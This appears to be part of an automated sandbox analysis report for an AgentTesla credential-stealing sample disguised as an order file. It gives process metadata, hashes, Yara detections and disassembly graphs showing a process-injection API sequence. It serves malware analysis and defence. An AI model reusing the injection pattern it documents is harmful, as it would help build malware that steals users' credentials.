                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:4
                                                                                          Start time:16:01:57
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          General

                                                                                          Target ID:5
                                                                                          Start time:16:01:57
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Users\user\Desktop\ORDER#023_2024.exe
                                                                                          Wow64 process (32bit):true
                                                                                          Commandline:"C:\Users\user\Desktop\ORDER#023_2024.exe"
                                                                                          Imagebase:0xc10000
                                                                                          File size:642'048 bytes
                                                                                          MD5 hash:CB93D77357DF18FFB788E73E7F9E8BA1
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Yara matches:
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2905038066.000000000305A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000005.00000002.2903371766.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2905038066.0000000003001000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                          Reputation:low
                                                                                          Has exited:false

                                                                                          General

                                                                                          Target ID:6
                                                                                          Start time:16:02:00
                                                                                          Start date:04/12/2024
                                                                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                          Imagebase:0x7ff693ab0000
                                                                                          File size:496'640 bytes
                                                                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Disassembly

                                                                                          Reset < >

                                                                                            Execution Graph

                                                                                            Execution Coverage:10.2%
                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                            Signature Coverage:2.2%
                                                                                            Total number of Nodes:232
                                                                                            Total number of Limit Nodes:8
                                                                                            execution_graph 21496 6f590f0 21497 6f5927b 21496->21497 21499 6f59116 21496->21499 21499->21497 21500 6f56788 21499->21500 21501 6f59370 PostMessageW 21500->21501 21502 6f593dc 21501->21502 21502->21499 21503 2a34668 21504 2a34672 21503->21504 21508 2a34758 21503->21508 21513 2a33e34 21504->21513 21506 2a3468d 21509 2a34765 21508->21509 21517 2a34868 21509->21517 21521 2a34858 21509->21521 21514 2a33e3f 21513->21514 21529 2a35d24 21514->21529 21516 2a36f8f 21516->21506 21519 2a3488f 21517->21519 21518 2a3496c 21518->21518 21519->21518 21525 2a344b4 21519->21525 21522 2a34868 21521->21522 21523 2a3496c 21522->21523 21524 2a344b4 CreateActCtxA 21522->21524 21524->21523 21526 2a358f8 CreateActCtxA 21525->21526 21528 2a359bb 21526->21528 21530 2a35d2f 21529->21530 21533 2a35da4 21530->21533 21532 2a371bd 21532->21516 21534 2a35daf 21533->21534 21537 2a35dd4 21534->21537 21536 2a3729a 21536->21532 21538 2a35ddf 21537->21538 21541 2a35df4 21538->21541 21540 2a3738d 21540->21536 21542 2a35dff 21541->21542 21544 2a388eb 21542->21544 21548 2a3afa0 21542->21548 21543 2a38929 21543->21540 21544->21543 21552 2a3d080 21544->21552 21557 2a3d090 21544->21557 21562 2a3afc8 21548->21562 21567 2a3afd8 21548->21567 21549 2a3afb6 21549->21544 21553 2a3d0b1 21552->21553 21554 2a3d0d5 21553->21554 21581 2a3d240 21553->21581 21585 2a3d22f 21553->21585 21554->21543 21559 2a3d0b1 21557->21559 21558 2a3d0d5 21558->21543 21559->21558 21560 2a3d240 2 API calls 21559->21560 21561 2a3d22f 2 API calls 21559->21561 21560->21558 21561->21558 21563 2a3afd8 21562->21563 21571 2a3b0d0 21563->21571 21576 2a3b0bf 21563->21576 21564 2a3afe7 21564->21549 21569 2a3b0d0 GetModuleHandleW 21567->21569 21570 2a3b0bf GetModuleHandleW 21567->21570 21568 2a3afe7 21568->21549 21569->21568 21570->21568 21572 2a3b104 21571->21572 21573 2a3b0e1 21571->21573 21572->21564 21573->21572 21574 2a3b308 GetModuleHandleW 21573->21574 21575 2a3b335 21574->21575 21575->21564 21577 2a3b0e1 21576->21577 21578 2a3b104 21576->21578 21577->21578 21579 2a3b308 GetModuleHandleW 21577->21579 21578->21564 21580 2a3b335 21579->21580 21580->21564 21582 2a3d24d 21581->21582 21583 2a3d287 21582->21583 21589 2a3cb78 21582->21589 21583->21554 21586 2a3d24d 21585->21586 21587 2a3d287 21586->21587 21588 2a3cb78 2 API calls 21586->21588 21587->21554 21588->21587 21590 2a3cb83 21589->21590 21592 2a3db98 21590->21592 21593 2a3cca4 21590->21593 21592->21592 21594 2a3ccaf 21593->21594 21595 2a35df4 2 API calls 21594->21595 21596 2a3dc07 21595->21596 21596->21592 21597 2a3d358 21598 2a3d39e 21597->21598 21602 2a3d528 21598->21602 21605 2a3d538 21598->21605 21599 2a3d48b 21608 2a3cc40 21602->21608 21606 2a3d566 21605->21606 21607 2a3cc40 DuplicateHandle 21605->21607 21606->21599 21607->21606 21609 2a3d5a0 DuplicateHandle 21608->21609 21610 2a3d566 21609->21610 21610->21599 21611 6f56fe9 21612 6f571f2 21611->21612 21613 6f57202 21612->21613 21616 6f57e60 21612->21616 21637 6f57e50 21612->21637 21617 6f57e7a 21616->21617 21618 6f57e82 21617->21618 21658 6f58707 21617->21658 21662 6f584db 21617->21662 21667 6f58a78 21617->21667 21672 6f58458 21617->21672 21677 6f58999 21617->21677 21682 6f58619 21617->21682 21687 6f5861f 21617->21687 21694 6f58b5c 21617->21694 21701 6f5851c 21617->21701 21706 6f5827c 21617->21706 21711 6f58c9d 21617->21711 21715 6f58573 21617->21715 21720 6f583b4 21617->21720 21725 6f58774 21617->21725 21729 6f5894f 21617->21729 21734 6f5830f 21617->21734 21739 6f588e2 21617->21739 21747 6f58422 21617->21747 21618->21613 21638 6f57e60 21637->21638 21639 6f57e82 21638->21639 21640 6f58774 2 API calls 21638->21640 21641 6f583b4 2 API calls 21638->21641 21642 6f58573 2 API calls 21638->21642 21643 6f58c9d 2 API calls 21638->21643 21644 6f5827c 2 API calls 21638->21644 21645 6f5851c 2 API calls 21638->21645 21646 6f58b5c 4 API calls 21638->21646 21647 6f5861f 4 API calls 21638->21647 21648 6f58619 2 API calls 21638->21648 21649 6f58999 2 API calls 21638->21649 21650 6f58458 2 API calls 21638->21650 21651 6f58a78 2 API calls 21638->21651 21652 6f584db 2 API calls 21638->21652 21653 6f58707 2 API calls 21638->21653 21654 6f58422 2 API calls 21638->21654 21655 6f588e2 4 API calls 21638->21655 21656 6f5830f 2 API calls 21638->21656 21657 6f5894f 2 API calls 21638->21657 21639->21613 21640->21639 21641->21639 21642->21639 21643->21639 21644->21639 21645->21639 21646->21639 21647->21639 21648->21639 21649->21639 21650->21639 21651->21639 21652->21639 21653->21639 21654->21639 21655->21639 21656->21639 21657->21639 21752 6f56410 21658->21752 21756 6f56408 21658->21756 21659 6f58725 21663 6f584e8 21662->21663 21760 6f564d0 21663->21760 21764 6f564c8 21663->21764 21664 6f58c7d 21668 6f58a7e 21667->21668 21768 6f55e50 21668->21768 21772 6f55e4a 21668->21772 21669 6f58505 21669->21618 21669->21669 21673 6f583c0 21672->21673 21674 6f58505 21673->21674 21675 6f55e50 ResumeThread 21673->21675 21676 6f55e4a ResumeThread 21673->21676 21674->21618 21675->21674 21676->21674 21678 6f589bd 21677->21678 21680 6f55e50 ResumeThread 21678->21680 21681 6f55e4a ResumeThread 21678->21681 21679 6f58505 21679->21618 21679->21679 21680->21679 21681->21679 21683 6f583c0 21682->21683 21684 6f58505 21683->21684 21685 6f55e50 ResumeThread 21683->21685 21686 6f55e4a ResumeThread 21683->21686 21684->21618 21685->21684 21686->21684 21690 6f564d0 WriteProcessMemory 21687->21690 21691 6f564c8 WriteProcessMemory 21687->21691 21688 6f583c0 21689 6f58505 21688->21689 21692 6f55e50 ResumeThread 21688->21692 21693 6f55e4a ResumeThread 21688->21693 21689->21618 21690->21688 21691->21688 21692->21689 21693->21689 21776 6f55f00 21694->21776 21780 6f55efa 21694->21780 21695 6f583c0 21696 6f58505 21695->21696 21697 6f55e50 ResumeThread 21695->21697 21698 6f55e4a ResumeThread 21695->21698 21696->21618 21697->21696 21698->21696 21702 6f58536 21701->21702 21704 6f55e50 ResumeThread 21702->21704 21705 6f55e4a ResumeThread 21702->21705 21703 6f58505 21703->21618 21704->21703 21705->21703 21707 6f5829e 21706->21707 21784 6f56b4c 21707->21784 21788 6f56b58 21707->21788 21713 6f55f00 Wow64SetThreadContext 21711->21713 21714 6f55efa Wow64SetThreadContext 21711->21714 21712 6f58cb7 21713->21712 21714->21712 21716 6f58aaf 21715->21716 21718 6f564d0 WriteProcessMemory 21716->21718 21719 6f564c8 WriteProcessMemory 21716->21719 21717 6f58af1 21718->21717 21719->21717 21721 6f583c0 21720->21721 21722 6f58505 21721->21722 21723 6f55e50 ResumeThread 21721->21723 21724 6f55e4a ResumeThread 21721->21724 21722->21618 21722->21722 21723->21722 21724->21722 21792 6f565bb 21725->21792 21796 6f565c0 21725->21796 21726 6f58796 21726->21618 21730 6f5851b 21729->21730 21732 6f55e50 ResumeThread 21730->21732 21733 6f55e4a ResumeThread 21730->21733 21731 6f58505 21731->21618 21732->21731 21733->21731 21735 6f58294 21734->21735 21737 6f56b4c CreateProcessA 21735->21737 21738 6f56b58 CreateProcessA 21735->21738 21736 6f58395 21736->21618 21737->21736 21738->21736 21740 6f58b6f 21739->21740 21741 6f583c0 21740->21741 21745 6f55f00 Wow64SetThreadContext 21740->21745 21746 6f55efa Wow64SetThreadContext 21740->21746 21742 6f58505 21741->21742 21743 6f55e50 ResumeThread 21741->21743 21744 6f55e4a ResumeThread 21741->21744 21742->21618 21743->21742 21744->21742 21745->21741 21746->21741 21748 6f583c0 21747->21748 21749 6f58505 21748->21749 21750 6f55e50 ResumeThread 21748->21750 21751 6f55e4a ResumeThread 21748->21751 21749->21618 21750->21749 21751->21749 21753 6f56450 VirtualAllocEx 21752->21753 21755 6f5648d 21753->21755 21755->21659 21757 6f56410 VirtualAllocEx 21756->21757 21759 6f5648d 21757->21759 21759->21659 21761 6f56518 WriteProcessMemory 21760->21761 21763 6f5656f 21761->21763 21763->21664 21765 6f564d0 WriteProcessMemory 21764->21765 21767 6f5656f 21765->21767 21767->21664 21769 6f55e90 ResumeThread 21768->21769 21771 6f55ec1 21769->21771 21771->21669 21773 6f55e90 ResumeThread 21772->21773 21775 6f55ec1 21773->21775 21775->21669 21777 6f55f45 Wow64SetThreadContext 21776->21777 21779 6f55f8d 21777->21779 21779->21695 21781 6f55f45 Wow64SetThreadContext 21780->21781 21783 6f55f8d 21781->21783 21783->21695 21785 6f56b58 CreateProcessA 21784->21785 21787 6f56da3 21785->21787 21787->21787 21789 6f56be1 CreateProcessA 21788->21789 21791 6f56da3 21789->21791 21791->21791 21793 6f565c0 ReadProcessMemory 21792->21793 21795 6f5664f 21793->21795 21795->21726 21797 6f5660b ReadProcessMemory 21796->21797 21799 6f5664f 21797->21799 21799->21726

                                                                                            Executed Functions

                                                                                            Function 06F548D8 Relevance: 1.6, Strings: 1, Instructions: 368COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 542 6f548d8-6f548ef 543 6f548f1-6f548f6 542->543 544 6f548f8-6f548fe 542->544 545 6f54901-6f54905 543->545 544->545 546 6f54907-6f5490c 545->546 547 6f5490e-6f54914 545->547 548 6f54917-6f5491b 546->548 547->548 549 6f5491d-6f5493a 548->549 550 6f5493f-6f54943 548->550 562 6f54b5f-6f54b68 549->562 551 6f54945-6f54962 550->551 552 6f54967-6f54972 550->552 551->562 553 6f54974-6f54977 552->553 554 6f5497a-6f54980 552->554 553->554 557 6f54986-6f54996 554->557 558 6f54b6b-6f54e0e 554->558 565 6f54998-6f549b6 557->565 566 6f549bb-6f549e0 557->566 570 6f54b1f-6f54b22 565->570 572 6f549e6-6f549ef 566->572 573 6f54b28-6f54b2d 566->573 570->572 570->573 572->558 576 6f549f5-6f54a0d 572->576 573->558 575 6f54b2f-6f54b32 573->575 578 6f54b34 575->578 579 6f54b36-6f54b39 575->579 583 6f54a1f-6f54a36 576->583 584 6f54a0f-6f54a14 576->584 578->562 579->558 581 6f54b3b-6f54b5d 579->581 581->562 593 6f54a3e-6f54a48 583->593 594 6f54a38 583->594 584->558 587 6f54a1a-6f54a1d 584->587 587->583 588 6f54a4d-6f54a52 587->588 588->558 591 6f54a58-6f54a67 588->591 600 6f54a6f-6f54a7f 591->600 601 6f54a69 591->601 593->573 594->593 600->558 604 6f54a85-6f54a88 600->604 601->600 604->558 606 6f54a8e-6f54a91 604->606 607 6f54a93-6f54a97 606->607 608 6f54ae2-6f54af4 606->608 607->558 610 6f54a9d-6f54aa3 607->610 608->570 614 6f54af6-6f54b0b 608->614 612 6f54aa5-6f54aab 610->612 613 6f54ab4-6f54aba 610->613 612->558 616 6f54ab1 612->616 613->558 617 6f54ac0-6f54acc 613->617 621 6f54b13-6f54b1d 614->621 622 6f54b0d 614->622 616->613 623 6f54ad4-6f54ae0 617->623 621->573 622->621 623->608
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 4'^q
                                                                                            • API String ID: 0-1614139903
                                                                                            • Opcode ID: 2c0f49e557c573d38cf74bedd0a643656bc3e5e5331bc8945871102f67e8b671
                                                                                            • Instruction ID: ead8b8f2e17d8e088212c063d8e3e3ad0c05a303f4a01f1159d2cba421a93376
                                                                                            • Opcode Fuzzy Hash: 2c0f49e557c573d38cf74bedd0a643656bc3e5e5331bc8945871102f67e8b671
                                                                                            • Instruction Fuzzy Hash: F7E16F34A00209DFDF45EFB8CA94AAEBBF2FB88304F118465D905A7758CB319D85CB51
                                                                                            Function 06F583B4 Relevance: .1, Instructions: 67COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a882dc851404549e7f26bbfc9e9139d4bdcae9bd9ca4e77d65d76a690edcad8c
                                                                                            • Instruction ID: d1b04ed1de1918edc41501052d53539d7f33daa6885b4f54263b9df73a39b517
                                                                                            • Opcode Fuzzy Hash: a882dc851404549e7f26bbfc9e9139d4bdcae9bd9ca4e77d65d76a690edcad8c
                                                                                            • Instruction Fuzzy Hash: EF213B35809268CFDBA0CF54D4447FCBBF9EB5A391F1150D69A2EA6251CB308E85CF41
                                                                                            Function 02A3B0D0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 198COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 294 2a3b0d0-2a3b0df 295 2a3b0e1-2a3b0ee call 2a39ad4 294->295 296 2a3b10b-2a3b10f 294->296 303 2a3b0f0 295->303 304 2a3b104 295->304 298 2a3b123-2a3b164 296->298 299 2a3b111-2a3b11b 296->299 305 2a3b171-2a3b17f 298->305 306 2a3b166-2a3b16e 298->306 299->298 350 2a3b0f6 call 2a3b368 303->350 351 2a3b0f6 call 2a3b358 303->351 304->296 307 2a3b1a3-2a3b1a5 305->307 308 2a3b181-2a3b186 305->308 306->305 310 2a3b1a8-2a3b1af 307->310 311 2a3b191 308->311 312 2a3b188-2a3b18f call 2a3aab4 308->312 309 2a3b0fc-2a3b0fe 309->304 313 2a3b240-2a3b300 309->313 316 2a3b1b1-2a3b1b9 310->316 317 2a3b1bc-2a3b1c3 310->317 314 2a3b193-2a3b1a1 311->314 312->314 345 2a3b302-2a3b305 313->345 346 2a3b308-2a3b333 GetModuleHandleW 313->346 314->310 316->317 318 2a3b1d0-2a3b1d9 call 2a3aac4 317->318 319 2a3b1c5-2a3b1cd 317->319 325 2a3b1e6-2a3b1eb 318->325 326 2a3b1db-2a3b1e3 318->326 319->318 327 2a3b209-2a3b216 325->327 328 2a3b1ed-2a3b1f4 325->328 326->325 335 2a3b239-2a3b23f 327->335 336 2a3b218-2a3b236 327->336 328->327 330 2a3b1f6-2a3b206 call 2a3aad4 call 2a3aae4 328->330 330->327 336->335 345->346 347 2a3b335-2a3b33b 346->347 348 2a3b33c-2a3b350 346->348 347->348 350->309 351->309
                                                                                            APIs
                                                                                            • GetModuleHandleW.KERNEL32(00000000), ref: 02A3B326
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule
                                                                                            • String ID: N$N
                                                                                            • API String ID: 4139908857-1044518071
                                                                                            • Opcode ID: 5e6b7b9e796c4c2c8917bf95c11a74440aa3f2c8c17bcf6103740580f4812561
                                                                                            • Instruction ID: 6cfb2ad11cf20711521739f10fbd29634b40470dc92839527001e994a0d0445b
                                                                                            • Opcode Fuzzy Hash: 5e6b7b9e796c4c2c8917bf95c11a74440aa3f2c8c17bcf6103740580f4812561
                                                                                            • Instruction Fuzzy Hash: 77714770A00B458FD725DF6AD58475ABBF2FF88304F00892DE48AD7A50DB75E949CBA0
                                                                                            Function 06F56B4C Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 427 6f56b4c-6f56bed 430 6f56c26-6f56c46 427->430 431 6f56bef-6f56bf9 427->431 438 6f56c7f-6f56cae 430->438 439 6f56c48-6f56c52 430->439 431->430 432 6f56bfb-6f56bfd 431->432 433 6f56c20-6f56c23 432->433 434 6f56bff-6f56c09 432->434 433->430 436 6f56c0d-6f56c1c 434->436 437 6f56c0b 434->437 436->436 440 6f56c1e 436->440 437->436 447 6f56ce7-6f56da1 CreateProcessA 438->447 448 6f56cb0-6f56cba 438->448 439->438 441 6f56c54-6f56c56 439->441 440->433 443 6f56c79-6f56c7c 441->443 444 6f56c58-6f56c62 441->444 443->438 445 6f56c64 444->445 446 6f56c66-6f56c75 444->446 445->446 446->446 449 6f56c77 446->449 459 6f56da3-6f56da9 447->459 460 6f56daa-6f56e30 447->460 448->447 450 6f56cbc-6f56cbe 448->450 449->443 452 6f56ce1-6f56ce4 450->452 453 6f56cc0-6f56cca 450->453 452->447 454 6f56ccc 453->454 455 6f56cce-6f56cdd 453->455 454->455 455->455 457 6f56cdf 455->457 457->452 459->460 470 6f56e40-6f56e44 460->470 471 6f56e32-6f56e36 460->471 473 6f56e54-6f56e58 470->473 474 6f56e46-6f56e4a 470->474 471->470 472 6f56e38 471->472 472->470 476 6f56e68-6f56e6c 473->476 477 6f56e5a-6f56e5e 473->477 474->473 475 6f56e4c 474->475 475->473 479 6f56e7e-6f56e85 476->479 480 6f56e6e-6f56e74 476->480 477->476 478 6f56e60 477->478 478->476 481 6f56e87-6f56e96 479->481 482 6f56e9c 479->482 480->479 481->482 484 6f56e9d 482->484 484->484
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F56D8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: f23db75d5b2d8dfc3704b9740a735fdae5490ff9b4b12995161410a75d98da97
                                                                                            • Instruction ID: ab24889091ca65f0a92a7ad58ca827ff56cf2e55aa1855b696e6a57558ad26ef
                                                                                            • Opcode Fuzzy Hash: f23db75d5b2d8dfc3704b9740a735fdae5490ff9b4b12995161410a75d98da97
                                                                                            • Instruction Fuzzy Hash: 52A17771D002198FDF60CF68C844BAEBBB2EF48314F0585A9E958E7260DB749985CF91
                                                                                            Function 06F56B58 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 485 6f56b58-6f56bed 487 6f56c26-6f56c46 485->487 488 6f56bef-6f56bf9 485->488 495 6f56c7f-6f56cae 487->495 496 6f56c48-6f56c52 487->496 488->487 489 6f56bfb-6f56bfd 488->489 490 6f56c20-6f56c23 489->490 491 6f56bff-6f56c09 489->491 490->487 493 6f56c0d-6f56c1c 491->493 494 6f56c0b 491->494 493->493 497 6f56c1e 493->497 494->493 504 6f56ce7-6f56da1 CreateProcessA 495->504 505 6f56cb0-6f56cba 495->505 496->495 498 6f56c54-6f56c56 496->498 497->490 500 6f56c79-6f56c7c 498->500 501 6f56c58-6f56c62 498->501 500->495 502 6f56c64 501->502 503 6f56c66-6f56c75 501->503 502->503 503->503 506 6f56c77 503->506 516 6f56da3-6f56da9 504->516 517 6f56daa-6f56e30 504->517 505->504 507 6f56cbc-6f56cbe 505->507 506->500 509 6f56ce1-6f56ce4 507->509 510 6f56cc0-6f56cca 507->510 509->504 511 6f56ccc 510->511 512 6f56cce-6f56cdd 510->512 511->512 512->512 514 6f56cdf 512->514 514->509 516->517 527 6f56e40-6f56e44 517->527 528 6f56e32-6f56e36 517->528 530 6f56e54-6f56e58 527->530 531 6f56e46-6f56e4a 527->531 528->527 529 6f56e38 528->529 529->527 533 6f56e68-6f56e6c 530->533 534 6f56e5a-6f56e5e 530->534 531->530 532 6f56e4c 531->532 532->530 536 6f56e7e-6f56e85 533->536 537 6f56e6e-6f56e74 533->537 534->533 535 6f56e60 534->535 535->533 538 6f56e87-6f56e96 536->538 539 6f56e9c 536->539 537->536 538->539 541 6f56e9d 539->541 541->541
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 06F56D8E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateProcess
                                                                                            • String ID:
                                                                                            • API String ID: 963392458-0
                                                                                            • Opcode ID: 9dc02dbd4c17787fa99de3b7f6780f9d76905f26d728b172ea2d2d9a9af64dd8
                                                                                            • Instruction ID: e02b63ebd646351758ea8dac08418ac17de90808570743c56adf6edb4fa2ccf6
                                                                                            • Opcode Fuzzy Hash: 9dc02dbd4c17787fa99de3b7f6780f9d76905f26d728b172ea2d2d9a9af64dd8
                                                                                            • Instruction Fuzzy Hash: 73916871D002198FDF60CF68C844BADBBB2FF48314F1585A9E958E7260DB749985CF91
                                                                                            Function 02A344B4 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 650 2a344b4-2a359b9 CreateActCtxA 653 2a359c2-2a35a1c 650->653 654 2a359bb-2a359c1 650->654 661 2a35a2b-2a35a2f 653->661 662 2a35a1e-2a35a21 653->662 654->653 663 2a35a31-2a35a3d 661->663 664 2a35a40 661->664 662->661 663->664 666 2a35a41 664->666 666->666
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02A359A9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 92904c4fe3c98b0ad4906edcd09753ed414170c4e919ec8f0a55deb572915716
                                                                                            • Instruction ID: 819b5c102a9feb81505b5f24182857cafd95d207aa8e45e8a0f508ad99b9fb87
                                                                                            • Opcode Fuzzy Hash: 92904c4fe3c98b0ad4906edcd09753ed414170c4e919ec8f0a55deb572915716
                                                                                            • Instruction Fuzzy Hash: 6E41D1B0C0075DCBDB24DFA9C884B9EBBB5BF49304F60806AE408AB255DB756945CF90
                                                                                            Function 02A358ED Relevance: 1.6, APIs: 1, Instructions: 94COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 667 2a358ed-2a359b9 CreateActCtxA 669 2a359c2-2a35a1c 667->669 670 2a359bb-2a359c1 667->670 677 2a35a2b-2a35a2f 669->677 678 2a35a1e-2a35a21 669->678 670->669 679 2a35a31-2a35a3d 677->679 680 2a35a40 677->680 678->677 679->680 682 2a35a41 680->682 682->682
                                                                                            APIs
                                                                                            • CreateActCtxA.KERNEL32(?), ref: 02A359A9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1679254348.0000000002A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A30000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_2a30000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Create
                                                                                            • String ID:
                                                                                            • API String ID: 2289755597-0
                                                                                            • Opcode ID: 4f5a9b84716c2e1a9b426a498662da05ae4eea1340f57c08fdd3bed68f131b1a
                                                                                            • Instruction ID: 3769f99b98d9f56983579e01fb461970e9592056325a04f57922a829da0ba1e2
                                                                                            • Opcode Fuzzy Hash: 4f5a9b84716c2e1a9b426a498662da05ae4eea1340f57c08fdd3bed68f131b1a
                                                                                            • Instruction Fuzzy Hash: 0441E3B0C00759CFDB24CFA9C884BCEBBB5BF49314F64805AE408AB255DB756945CF90
                                                                                            Function 06F564C8 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 683 6f564c8-6f5651e 686 6f56520-6f5652c 683->686 687 6f5652e-6f5656d WriteProcessMemory 683->687 686->687 689 6f56576-6f565a6 687->689 690 6f5656f-6f56575 687->690 690->689
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F56560
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1691762415.0000000006F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F50000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_6f50000_ORDER#023_2024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MemoryProcessWrite
                                                                                            • String ID:
                                                                                            • API String ID: 3559483778-0
                                                                                            • Opcode ID: 10005399de344dec7d08e0e771cc70fe51a20acbc44aee4c3436ef98bffd68cd
                                                                                            • Instruction ID: 98d0253965caa84d31f10605215c11aa126546f0415a43c541ff0250a739db88
                                                                                            • Opcode Fuzzy Hash: 10005399de344dec7d08e0e771cc70fe51a20acbc44aee4c3436ef98bffd68cd
                                                                                            • Instruction Fuzzy Hash: F12124B1D003499FCB10DFA9C885BDEBFF4FB48314F10842AE959A7251D7789945CBA4
                                                                                            Function 06F564D0 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 694 6f564d0-6f5651e 696 6f56520-6f5652c 694->696 697 6f5652e-6f5656d WriteProcessMemory 694->697 696->697 699 6f56576-6f565a6 697->699 700 6f5656f-6f56575 697->700 700->699
                                                                                            APIs
                                                                                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 06F56560
